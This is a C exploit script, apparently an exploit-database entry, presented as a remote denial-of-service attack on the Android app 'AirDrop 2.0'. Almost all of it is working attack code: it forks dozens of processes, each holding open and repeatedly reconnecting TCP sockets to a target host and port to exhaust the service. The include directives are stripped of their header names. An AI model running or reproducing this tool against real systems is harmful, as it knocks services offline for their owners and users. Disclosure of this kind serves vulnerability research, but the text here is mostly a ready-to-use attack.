#include #include #include #include #include #include #include #include #include #include #include // ************************************************************************ // * Author: Marcelo VA!zquez (aka s4vitar) * // * AirDrop 2.0 Remote Denial of Service (DoS) * // ************************************************************************ // Exploit Title: AirDrop 2.0 Remote Denial of Service (DoS) // Date: 2019-02-21 // Exploit Author: Marcelo VA!zquez (aka s4vitar) // Vendor Homepage: https://support.apple.com/en-us/HT204144 // Software Link: https://apkpure.com/airdrop-wifi-file-transfer/com.airdrop.airdroid.shareit.xender.filetransfer // Version: <= AirDrop 2.0 // Tested on: Android int make_socket(char *host, char *port) { struct addrinfo hints, *servinfo, *p; int sock, r; memset(&hints, 0, sizeof(hints)); hints.ai_family = AF_UNSPEC; hints.ai_socktype = SOCK_STREAM; if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) { fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r)); exit(0); } for(p = servinfo; p != NULL; p = p->ai_next) { if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) { continue; } if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) { close(sock); continue; } break; } if(p == NULL) { if(servinfo) freeaddrinfo(servinfo); fprintf(stderr, "No connection could be made\n"); exit(0); } if(servinfo) freeaddrinfo(servinfo); fprintf(stderr, "[Connected -> %s:%s]\n", host, port); return sock; } void broke(int s) { // Nothing to do } #define CONNECTIONS 8 #define THREADS 48 void attack(char *host, char *port, int id) { int sockets[CONNECTIONS]; int x, g=1, r; for(x=0; x!= CONNECTIONS; x++) sockets[x]=0; signal(SIGPIPE, &broke); while(1) { for(x=0; x != CONNECTIONS; x++) { if(sockets[x] == 0) sockets[x] = make_socket(host, port); r=write(sockets[x], "\0", 1); if(r == -1) { close(sockets[x]); sockets[x] = make_socket(host, port); } } usleep(300000); } } int main(int argc, char **argv) { int x; if (argc < 3) { printf("Usage: ./AirDrop_DoS \n"); exit(-1); } for(x=0; x != THREADS; x++) { if(fork()) attack(argv[1], argv[2], x); usleep(200000); } getc(stdin); return 0; }